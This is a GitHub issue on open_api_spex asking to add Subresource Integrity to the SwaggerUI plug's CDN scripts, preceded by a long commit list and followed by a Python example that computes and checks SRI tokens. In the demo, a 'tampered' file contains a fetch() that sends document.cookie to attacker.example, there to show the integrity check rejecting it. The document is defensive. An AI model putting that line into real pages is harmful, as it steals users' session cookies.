Adding "integrity" to CDN-based resources (JS/CSS), thoughts? #559
thbar added a commit to etalab/transport-site that referenced this issue on Aug 28, 2023.
github-merge-queue bot pushed a commit to etalab/transport-site that referenced this issue on Sep 4, 2023. Commit message:

* Change case to reflect current branding
* Improve description
* Fix AOM API schema (#3350)
* Run mix format
* Fix community_resources.updated
* Fix more datasets spec
* Update schemas.ex
* Fix format
* Add assert_schema on datasets list operation
* Fix /api/datasets specification
  We now properly report the response to be an array of Datasets, instead of a single Dataset.
* Rename operation response (unsure of the impact)
* Update documentation for datasets operation
* Add more assert_schema
* Achieve more assert schemas
* Fix Dialyzer issues (#3397)
* Fix credo warning
* Add missing data required for API output
  See:
  - #3396
  - #3399
* Make .aom.siren officially nullable
  See:
  - #3396
  This will fix tests and make sure to reflect the actual production data.
* Group operations together on the swagger UI
* Update doc to reflect reality
* Add TODO
* Add one aom test at least
* Fix test
* Fix & modernize AOM specs (#3401)
* Start fixing Resource & CommunityResource specs
* Fix Autocomplete spec & add assert_schema
* Start fixing Dataset spec
* Update stats_controller_test.exs
* Add notes about conversions
* Add TODO
* Remove unused import
* Add TODO
* Add req in dev for scripting
  Required because I now run some scripts with `mix run` to get the full app env.
* Format
* Create .gitignore
* Format
* Remove sometimes unseen field to reflect API behaviour
* Format
* Format
* Format
* Add missing schema_version
* Format
* Format
* Temporary allow community resources here (#3407)
* Start fixing CoveredArea (just country case for now)
* Save WIP script used to validate current production data against local OpenAPI spec
* Remove TODO
* Add CoveredArea.Region and CoveredArea.AOM
* Advertise behaviour #3408
* Add CoveredArea.Cities
* Enforce type value for covered areas
* Enforce type field value for Region
* Remove bogus property
* Format
* Fix broken cities schema
* Refactor dataset spec
  Improvements:
  - extract spec so that history is not allowed in the summarized view
  - make all keys required with an opt-out option
* Emphasize this specific response is summarized a bit
* Remove all "nullable: false" (since this is the default)
* Introduce summarized vs detailed Resource
* Improve GeoJSON / NeTEx checks
* Set properties for community & regular resources
* Format
* Remove todo (won't do that)
* Fix optional properties
* Download all the datasets JSON
* Improve dataset details spec
* Remove TODO
* Verify Resource properties
* Allow direct "./scripts/api/spec_check.exs" invoke from shell
* Increase timeout
* Refactor tests for clarity
* Disable highlight to fix SwaggerUI hanging in browser on large payloads (#3421)
* Add note about SwaggerUI version
  See open-api-spex/open_api_spex#559
* Add useful links
* Mix format
* Add obsolete note
* Fix wording
* Remove comment which applies everywhere
* Require all by default
* Improve factories for required data (for tests to pass)
  Related:
  - #3399
* Improve wording
* Fix broken specs
* Fix broken specs
* Fix broken assertion
* Fix broken spec
* Add extra assert_schema
* Apply routing related match error fix
* Enforce additionalProperties: false for all detected schemas with type object
* Run mix format
* DRY optional keys & remove TODO
* Fix credo warning
* Fix credo warning
* Fix credo warning
* Fix typo
* Start verifying feature collections
* Allow extra property for GeometryBase
* Remove unused import
* Fix (I think) Polygon to make tests pass
* Move id to the right place
* Add missing type
* DRY things a bit
* Add quiet TODO
* Add note
* Remove TODO (this is not correct)
* Add note
* Specify history & remove TODO
* Remove TODO (will put it in the description of the PR)
* Fix incorrect note
* Fix broken link
* Add note
* Update schemas.ex
* Mix format
* Improve texts
* Mix format
* Update apps/transport/lib/transport_web/api/controllers/places_controller.ex
  Co-authored-by: Antoine Augusti <[email protected]>
* Update apps/transport/lib/transport_web/api/schemas.ex
  Co-authored-by: Antoine Augusti <[email protected]>
* Update apps/transport/lib/transport_web/api/schemas.ex
  Co-authored-by: Antoine Augusti <[email protected]>
* Update apps/transport/test/support/factory.ex
  Co-authored-by: Antoine Augusti <[email protected]>
* Update apps/transport/test/transport_web/controllers/api/schemas_test.exs
  Co-authored-by: Antoine Augusti <[email protected]>
* Update apps/transport/test/transport_web/controllers/api/schemas_test.exs
  Co-authored-by: Antoine Augusti <[email protected]>
* Update apps/transport/lib/transport_web/api/spec.ex
  Co-authored-by: Antoine Augusti <[email protected]>
* Add note
* Update apps/transport/test/transport_web/controllers/api/stats_controller_test.exs
  Co-authored-by: Antoine Augusti <[email protected]>
* Fix broken test

---------

Co-authored-by: Antoine Augusti <[email protected]>
While checking the version of SwaggerUI I noticed that the plug which specifies the JS/CSS resources relies on a CDN, but the integrity (https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) is not currently checked:

- open_api_spex/lib/open_api_spex/plug/swagger_ui.ex, line 43 in c1dbca1
- open_api_spex/lib/open_api_spex/plug/swagger_ui.ex, lines 69 to 70 in c1dbca1

In case of resource compromise on the CDN, this would allow arbitrary execution of JS on the main Phoenix app (since the plug is most of the time, I think, served from the same domain).

It would be worthwhile to add `integrity` to the resource (see https://stackoverflow.com/a/49061277/20302). I wonder if a more flexible approach to let version/integrity be provided by the user of OpenAPISpex could be better.

Let me know what you think!
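As an added example (not code from open_api_spex or from the issue author), the following Python script shows the two halves of what the issue asks for: computing the `integrity` token to pin a CDN-hosted JS/CSS file to, and the check a browser performs against that token, including the cases where the check silently does nothing. It is written in Python rather than the plug's Elixir so it can run stand-alone; the CDN URL and the file bytes are constructed placeholders, not the ones the plug uses.

```python
import base64
import hashlib
import html
import re

# Hash functions browsers accept for SRI, listed weakest to strongest.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")

# One integrity token: "<alg>-<base64 digest>", optionally followed by "?options".
_TOKEN_RE = re.compile(r"^(sha256|sha384|sha512)-([A-Za-z0-9+/]+={0,2})(?:\?.*)?$")


def sri_digest(content: bytes, algorithm: str = "sha384") -> str:
    """Return the integrity token for `content`, e.g. 'sha384-<base64>'.

    This is computed once over the pinned, downloaded release of the CDN
    file and pasted into the template; it must be regenerated on every
    version bump.
    """
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"not an SRI hash function: {algorithm}")
    raw = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(raw).decode('ascii')}"


def parse_integrity(attr: str) -> dict:
    """Parse a space-separated integrity attribute into {algorithm: {digest, ...}}.

    Malformed tokens and unknown hash functions are dropped, as browsers do.
    """
    parsed = {}
    for token in attr.split():
        m = _TOKEN_RE.match(token)
        if m:
            parsed.setdefault(m.group(1), set()).add(m.group(2))
    return parsed


def verify_integrity(content: bytes, attr: str) -> bool:
    """Decide whether a browser would apply `content` given the attribute `attr`.

    Only the strongest hash function present is considered; the resource is
    accepted if any digest listed for it matches. If no usable token remains,
    the attribute is treated as absent and the load is NOT blocked, so a typo
    in the attribute silently removes the protection.
    """
    parsed = parse_integrity(attr)
    if not parsed:
        return True
    strongest = max(parsed, key=SRI_ALGORITHMS.index)
    actual = sri_digest(content, strongest).split("-", 1)[1]
    return actual in parsed[strongest]


def script_tag(src: str, integrity: str) -> str:
    """<script> tag pinned to `integrity`; crossorigin is required on a CDN origin,
    otherwise the browser refuses to load a cross-origin resource carrying integrity."""
    return (f'<script src="{html.escape(src, quote=True)}" '
            f'integrity="{html.escape(integrity, quote=True)}" '
            f'crossorigin="anonymous"></script>')


def stylesheet_tag(href: str, integrity: str) -> str:
    """<link rel="stylesheet"> tag pinned to `integrity`."""
    return (f'<link rel="stylesheet" href="{html.escape(href, quote=True)}" '
            f'integrity="{html.escape(integrity, quote=True)}" '
            f'crossorigin="anonymous">')


if __name__ == "__main__":
    # Constructed stand-ins for the CDN file; the URL is a placeholder,
    # not the one the plug actually points at.
    bundle_js = b"window.SwaggerUIBundle = function () {};\n"
    cdn_url = "https://cdn.example/swagger-ui-dist@5.x/swagger-ui-bundle.js"

    token = sri_digest(bundle_js)
    print(script_tag(cdn_url, token))

    # A compromised CDN serving different bytes is rejected by the browser.
    tampered = bundle_js + b"fetch('https://attacker.example/?c=' + document.cookie);\n"
    print("original accepted:", verify_integrity(bundle_js, token))
    print("tampered accepted:", verify_integrity(tampered, token))
```

Two points worth keeping in mind when wiring this into a plug that lets the user supply version and integrity: the token is only as good as the copy of the file it was computed from, so compute it from a release artifact you have verified (e.g. the npm tarball), not from whatever the CDN happens to serve today; and because an unparseable attribute disables the check rather than failing closed, a quick assertion that `parse_integrity(token)` is non-empty at startup catches copy-paste mistakes.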